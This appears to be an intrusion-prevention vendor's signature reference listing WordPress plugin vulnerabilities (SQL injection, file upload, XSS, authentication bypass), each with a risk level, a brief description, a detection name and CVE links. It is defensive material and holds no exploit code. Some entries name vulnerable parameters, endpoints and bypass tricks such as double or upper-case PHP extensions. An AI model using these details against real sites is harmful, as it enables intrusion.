Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution

About this vulnerability: A vulnerability in WP Ninjas Ninja Forms File Upload
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WP Ninjas Ninja Forms File Upload
Type: Malfunction
Description: There has been reported a remote code execution vulnerability in the Ninja Forms Plugin for WordPress. This vulnerability could be exploited by a remote attacker. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution
References:
CVE-2019-10869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10869
Back to top

Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi

About this vulnerability: A vulnerability in the Paid Membership Pro WordPress plugin.
Risk: High
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1550-5242
Platform: Generic
Software: Wordpress Paid Membership
Type: Input Validation
Description: A vulnerability in the Paid Membership Pro WordPress plugin, versions before 2.9.8, which allows remote attackers to execute arbitrary SQL commands via /pmpro/v1/order in the "code" parameter.
Situation: HTTP_CRL-Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi
References:
CVE-2023-23488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23488
Back to top

Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload

About this vulnerability: An attempt to exploit a vulnerability in the WordPress Paid Memberships Pro Plugin detected.
Risk: High
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Platform: Generic
Software: Wordpress Paid Membership
Type: Input Validation
Description: A vulnerability in the WordPress Paid Memberships Pro Plugin, versions prior to 2.12.4, which allows remote attackers to upload arbitrary files and execute code by sending a crafted request to the target server, due to insufficient file type validation in the pmpro_paypalexpress_session_vars_for_user_fields function.
Situation: HTTP_CS-Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload
References:
CVE-2023-6187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6187
Back to top

Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS

About this vulnerability: A vulnerability in WordPress Project Paid Memberships Pro Plugin
Risk: Moderate
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Missing input validation in the pmpro_getCheckoutButton() method in the Wordpress Paid Memberships Pro Plugin causes a stored cross-site scripting vulnerability. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS
References:
CVE-2022-4830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4830
Back to top

Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Paid Memberships Pro Plugin
Risk: Moderate
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: The WordPress Paid Memberships Pro Plugin does not properly validate and escape shortcode parameter in pmpro_shortcode_membership() before using them in SQL statements, causing an SQL injection vulnerability. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection
References:
CVE-2023-0631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0631
Back to top

Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Paid Memberships Pro Plugin
Risk: High
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the Wordpress plugin Paid Memberships Pro. The vulnerability is due to insufficient input validation of the discount_code parameter while processing requests to the /pmpro/v1/checkout_level endpoint. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation in the worst case could result in execution of arbitrary SQL queries.
Situation: HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection
References:
CVE-2021-25114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25114
Back to top

Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762

About this vulnerability: An attempt to exploit a vulnerability in WordPress Perfect Survey plugin detected
Risk: High
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1500-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the Perfect Survey WordPress plugin versions before 1.5.2.
Situation: HTTP_CSU-Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762
References:
CVE-2021-24762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24762
Back to top

Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project 10Web Photo Gallery
Risk: Moderate
First detected in: sgpkg-ips-1471-5242
Last changed: sgpkg-ips-1471-5242
Platform: Generic
Software: WordPress 10Web Photo Gallery Plugin
Type: Input Validation
Description: Improper input validation for the filter_tag parameter causes an SQL injection vulnerability in the WordPress Photo Gallery plugin. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection
References:
CVE-2022-1281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1281
Back to top

Wordpress-Photo-Gallery-Plugin-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project 10Web Photo Gallery
Risk: Moderate
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1448-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper input validation for the bwg_tag_id_bwg_thumbnails_0 parameter causes an SQL injection vulnerability in the Wordpress Photo Gallery plugin. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Photo-Gallery-Plugin-SQL-Injection
References:
CVE-2022-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0169
Back to top

Wordpress-Photo-Gallery-Unrestricted-File-Upload

About this vulnerability: Wordpress Photo Gallery Unrestricted File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress Photo Gallery
Type: Input Validation
Description: A vulnerability in WordPress Photo Gallery 1.2.5 which allows remote attackers to upload arbitrary PHP files, and execute them in the context of the web server process, due to the post() method in UploadHandler.php not properly sanitizing the user uploaded files.
Situation: HTTP_CS-Wordpress-Photo-Gallery-Unrestricted-File-Upload
References:
CVE-2014-9312
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9312
OSVDB-117676
http://www.osvdb.org/117676
Back to top

Wordpress-PHPMailer-Host-Header-Command-Injection

About this vulnerability: A WordPress PHPMailer Host Header Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: WordPress
Type: Input Validation
Description: A vulnerability in WordPress core 4.6 which allows remote attackers to execute arbitrary code via a spoofed header to PHPMailer, due to improper input validation.
Situation: HTTP_CSH-Wordpress-PHPMailer-Host-Header-Command-Injection
References:
CVE-2016-10033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033
Back to top

Wordpress-Plainview-Activity-Monitor-RCE

About this vulnerability: A vulnerability in Wordpress Plainview Activity Monitor
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wordpress Plainview Activity Monitor
Type: Code Injection
Description: There exists a vulnerability in Wordpress Plainview Activity Monitor, version 20161228, which allows remote attackers to execute arbitrary code in the ip parameter within a reuest to wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools.
Situation: HTTP_CRL-Wordpress-Plainview-Activity-Monitor-RCE
References:
CVE-2018-15877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15877
Back to top

Wordpress-Plugin-Backup-Guard-Authenticated-RCE

About this vulnerability: A vulnerability in Wordpress Backup Guard Plugin.
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Generic
Software: Wordpress Backup Guard Plugin
Type: Input Validation
Description: A vulnerability in the Wordpress Backup Guard Plugin, versions before 1.6.0, which allow a remote attacker to upload an arbitrary PHP file due to the insufficient check for an SGBP file extension.
Situation: HTTP_CS-Wordpress-Plugin-Backup-Guard-Authenticated-RCE
References:
CVE-2021-24155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24155
Back to top

Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation

About this vulnerability: A vulnerability in Wordpress bbPress plugin
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Generic
Software: Wordpress bbPress
Type: Input Validation
Description: There exists a vulnerability in the plugin bbPress for WordPress, versions before 2.6.5, which allows remote attackers to bypass authentication when registration is enabled, due to lack of validation on user authorization requests.
Situation: HTTP_CRL-Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation
References:
CVE-2020-13693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13693
Back to top

Wordpress-Plugin-Catch-Themes-Demo-Import-RCE

About this vulnerability: A vulnerability in the Wordpress Catch Themes Demo Plugin.
Risk: High
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Platform: Generic
Software: Wordpress Catch Themes Demo Import Plugin
Type: Input Validation
Description: A vulnerability in the Wordpress Catch Themes Demo Plugin, before 1.8, which allows remote attackers to execute arbitrary code on a target system via an arbitrary file upload, due to unsufficient file type validation.
Situation: HTTP_CS-Wordpress-Plugin-Catch-Themes-Demo-Import-RCE
References:
CVE-2021-39352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39352
Back to top

Wordpress-Plugin-Duplicator-Arbitrary-File-Read

About this vulnerability: An attempt to exploit a vulnerability in Wordpress Plugin Duplicator detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: WordPress
Type: Malfunction
Description: An attempt to exploit a vulnerability in Wordpress Plugin Duplicator detected.
Situation: HTTP_CSU-Wordpress-Plugin-Duplicator-Arbitrary-File-Read
References:
CVE-2020-11738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11738
Back to top

Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution

About this vulnerability: A vulnerability in the WordPress plugin Elementor.
Risk: High
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: WordPress Elementor Plugin
Type: Input Validation
Description: A vulnerability in the WordPress plugin Elementor, versions 3.6.0 - 3.6.2, which allows remote attackers to execute arbitrary code by uploading zip files which contain malicious php.
Situation: File-Zip_Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution
References:
CVE-2022-1329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1329
Back to top

Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344

About this vulnerability: A vulnerability in the WordPress Like Button Plugin
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: WordPress Like Button Plugin
Type: Insecure Configuration
Description: An vulnerability in the WordPress Like Button Plugin, versions 1.6.0 and before, which allows remote attackers to bypass authentication and update settings via the each_page_url and code_snippet parameter in a request to wp-admin/admin.php?page=facebook-like-button.
Situation: HTTP_CRL-Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344
References:
CVE-2019-13344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13344
Back to top

Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE

About this vulnerability: A vulnerability in Wordpress Modern Events Calendar Plugin.
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Generic
Software: Wordpress Modern Events Calendar Plugin
Type: Input Validation
Description: A vulnerability in the Wordpress Modern Events Calendar Plugin, versions before 5.16.5, which allow a remote attacker to upload an arbitrary PHP file by setting the content-type to "text/csv" in a request.
Situation: HTTP_CS-Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE
References:
CVE-2021-24145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24145
Back to top

Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE

About this vulnerability: A vulnerability in WordPress Plugin Pie Register.
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: WordPress Plugin Pie Register
Type: Malfunction
Description: A vulnerability in the WordPress plugin Pie Register, versions 3.7.1.4 and before, which allows remote attackers to generate a valid admin cookie which is then used to generate and upload malicious plugins.
Situation: HTTP_CRL-Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE
Back to top

Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969

About this vulnerability: An attempt to exploit a vulnerability in WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection detected
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: WordPress Plugin Pie Register
Type: Malfunction
Description: An attempt to exploit a vulnerability in WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection detected.
Situation: HTTP_CRL-Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969
References:
CVE-2018-10969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10969
Back to top

Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE

About this vulnerability: A vulnerability in Wordpress SP Project And Document Plugin.
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Generic
Software: Wordpress SP Project And Document Plugin
Type: Input Validation
Description: A vulnerability in the Wordpress SP Project And Document Plugin, versions before 4.22, which allow a remote attacker to upload an arbitrary PHP file by using upper case letters in the PHP extension, due to the security check searching for only lower case letters.
Situation: HTTP_CS-Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE
References:
CVE-2021-24347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24347
Back to top

Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation

About this vulnerability: An attempt to exploit a vulnerability in WooCommerce-Payments plugin for Wordpress detected
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: WooCommerce-Payments Plugin
Type: Insecure Configuration
Description: A vulnerability in the WooCommerce-Payments plugin for Wordpress, version 5.6.1 and before, which allows remote attackers to bypass authentication by specifying a valid user ID number within the X-WCPAY-PLATFORM-CHECKOUT-USER header, giving the ability to use the API to create a new user with administrative privileges on the target WordPress site.
Situation: HTTP_CS-Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation
References:
CVE-2023-28121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28121
Back to top

Wordpress-Popular-Posts-Authenticated-RCE

About this vulnerability: A vulnerability in the Wordpress Popular Posts Plugin.
Risk: High
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Generic
Software: Wordpress Popular Posts Plugin
Type: Input Validation
Description: A vulnerability in the Wordpress Popular Posts Plugin, versions 5.3.2 and before, which allow remote attackers to execute arbitrary code by sending a php file with a double extension (.gif.php), due to unsufficient validation of extension type.
Situation: HTTP_CRL-Wordpress-Popular-Posts-Authenticated-RCE
References:
CVE-2021-42362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42362
Back to top

Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Popup Maker plugin
Risk: Moderate
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the Popup Maker plugin for WordPress. This vulnerability is due to improper input validation for the popup settings process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting
References:
CVE-2022-1104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1104
Back to top

Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498

About this vulnerability: An attempt to exploit a vulnerability in WordPress
Risk: Moderate
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper parsing of query parameters causes a vulnerability in WordPress Query Console. A successful exploitation allows a remote attacker to execute code on the target system.
Situation: HTTP_CRL-Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498
References:
CVE-2024-50498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
Back to top

Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924

About this vulnerability: An attempt to exploit a vulnerability in WordPress detected
Risk: High
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: The Really Simple Security plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the "check_login_and_get_user" function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
Situation: HTTP_CRL-Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924
References:
CVE-2024-10924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10924
Back to top

Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi

About this vulnerability: A vulnerability in the Wordpress RegistrationMagic Plugin.
Risk: High
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Platform: Generic
Software: Wordpress RegistrationMagic Plugin
Type: Input Validation
Description: A vulnerability in the Wordpress RegistrationMagic Plugin, versions before 5.0.1.5, which allows remote attackers to execute arbitrary SQL commands via the task_ids parameter, due to insufficient validation.
Situation: HTTP_CRL-Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi
References:
CVE-2021-24862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24862
Back to top

Wordpress-Rest-API-Posts-Controller-Privilege-Escalation

About this vulnerability: A vulnerability in WordPress Project WordPress
Risk: High
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: There exists a privilege excalation vulnerability in WordPress. A remote, unauthenticated attacker can use this to arbitrarily modify a WordPress post content.
Situation: HTTP_CRL-Wordpress-Rest-API-Posts-Controller-Privilege-Escalation
Back to top

Wordpress-RevSlider-Vulnerability

About this vulnerability: A vulnerability in WordPress RevSlider plugin
Risk: High
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress RevSlider Plugin
Type: Malfunction
Description: A vulnerability exists in WordPress plugin Slider Revolution (RevSlider) version 4.6 and earlier that allows a remote attacker to upload a malicious file on the server. A malware known as "SoakSoak" exploits this vulnerability.
Situation: HTTP_CSU-Possible-Scan-For-Wordpress-RevSlider-Vulnerability
Back to top

Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload

About this vulnerability: A vulnerability in WordPress Project Royal Elementor Addons and Templates Plugin
Risk: Moderate
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1709-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper user input validation when processing forms file uploads cayses a file upload vulnerability in the WordPress Project Royal Elementor Addons and Templates Plugin. A successful exploit allows an attacker to execute code on the target system with the privileges of the PHP process.
Situation: HTTP_CS-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
HTTP_CRL-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
References:
CVE-2023-5360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5360
Back to top

Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress WordPress
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: There exists a cross-site script insertion vulnerability in WordPress. The vulnerability is due to lack of sanitization for data supplied in the HTTP Host header. Remote attackers can exploit this vulnerability to execute arbitrary HTML and script code in the users' browser sessions in the context of the vulnerable web site. A successful attack will inject malicious HTML or script code in the target server RSS feed. If the URL in the RSS feed is opened on a client's browser, the arbitrary HTML and script code would be executed in the user's browser session, in the security context of the affected Web site.
Situation: HTTP_CSH-Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting
References:
CVE-2008-5278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5278
BID-32476
http://www.securityfocus.com/bid/32476
OSVDB-50214
http://www.osvdb.org/50214
Back to top

Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi

About this vulnerability: A vulnerability in the WordPress Secure Copy Content Protection and Content Locking Plugin.
Risk: High
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Platform: Generic
Software: WordPress Secure Copy Content Protection and Content Locking Plugin
Type: SQL Injection
Description: A vulnerability in the WordPress Secure Copy Content Protection and Content Locking Plugin, versions before 2.8.2, which allows remote attackers to execute SQL commands via the sccp_id[] parameter of the ays_sccp_results_export_file AJAX action, due to insufficient validation.
Situation: HTTP_CRL-Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi
References:
CVE-2021-24931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24931
Back to top

Wordpress-SEO-Plugin-Url-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project SEO Plugin by Squirrly SEO
Risk: Moderate
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported for in SEO Plugin for WordPress. This vulnerability is due to improper input validation for the url parameter. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection or, in the worst case, remote code execution in the context of the mysql user.
Situation: HTTP_CSU-Wordpress-SEO-Plugin-Url-SQL-Injection
HTTP_CRL-Wordpress-SEO-Plugin-Url-SQL-Injection
References:
CVE-2024-6497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6497
Back to top

Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Shield Security Plugin
Risk: High
First detected in: sgpkg-ips-1599-5242
Last changed: sgpkg-ips-1599-5242
Platform: Generic
Software: WordPress Shield Security Plugin
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the WordPress Shield Security plugin. This vulnerability is due to improper input validation of User-Agent HTTP header. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CSH-Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting
References:
CVE-2023-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0992
Back to top

Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826

About this vulnerability: A vulnerability in WordPress Simple Ads Manager
Risk: High
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-1299-5242
Platform: Generic
Software: WordPress Simple Ads Manager
Type: Input Validation
Description: There exists an information disclosure vulnerability in WordPress Simple Ads Manager. Information such as usernames and email addresses can inadvertently be leaked.
Situation: HTTP_CRL-Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826
References:
CVE-2015-2826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2826
Back to top

Wordpress-Simple-File-List-Plugin-Path-Traversal

About this vulnerability: A vulnerability in WordPress Simple File List Plugin
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: WordPress Simple File List Plugin
Type: Input Validation
Description: A path traversal vulnerability has been reported in WordPress Simple File List Plugin. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. This can be leveraged to obtain sensitive information from a target system.
Situation: HTTP_CSU-Wordpress-Simple-File-List-Plugin-Path-Traversal
References:
CVE-2022-1119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1119
Back to top

Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in WordPress Simple File List Plugin
Risk: High
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: WordPress Simple File List Plugin
Type: Malfunction
Description: There exists a vulberability in WordPress Simple File List Plugin, versions before 4.2.3, which allows remote attackers to execute arbitrary PHP code by uploading a PHP file with an allowed extension, e.g. png, then renaming and executing the file as the file extension restrictions do not apply to the renaming of files.
Situation: HTTP_CS-Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE
Back to top

Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion

About this vulnerability: An attempt to exploit a vulnerability in WordPress Social Warfare Plugin detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: WordPress
Type: Malfunction
Description: An attempt to exploit a vulnerability in WordPress Social Warfare Plugin detected.
Situation: HTTP_CSU-Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion
References:
CVE-2019-9978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
Back to top

Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project WP Statistics
Risk: Moderate
First detected in: sgpkg-ips-1567-5242
Last changed: sgpkg-ips-1567-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data in the search_engine parameter of requests sent to the WP Statistics plugin causes an SQL injection vulnerability, which allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection
References:
CVE-2022-4230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4230
Back to top

Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project The Events Calendar Plugin
Risk: Moderate
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper input validation for the RSVP name parameter causes a cross-site scripting vulnerability in the Events Calendar Plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting
References:
CVE-2024-6931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6931
Back to top

Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project TI WooCommerce Wishlist Plugin
Risk: Moderate
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitation of user-supplied data in item_id parameter in requests to the wishlist plugin causes an SQL injection vulnerability in WordPress. A successful exploit may allow the attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection
References:
CVE-2022-0412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0412
Back to top

Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in TI WooCommerce Wishlist plugin for WordPress
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper validation of user input causes an SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection
References:
CVE-2024-43917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43917
Back to top

Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload

About this vulnerability: A Wordpress Tribulant Slideshow Gallery PHP File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress Tribulant Slideshow Gallery
Type: Insecure Configuration
Description: An unrestricted file upload vulnerability exists in WordPress Tribulant Slideshow Gallery, versions before 1.4.7, which allow remote attackers to execute arbitrary code by uploading a PHP file then executing it by requesting the file.
Situation: HTTP_CS-Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload
References:
CVE-2014-5460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
Back to top

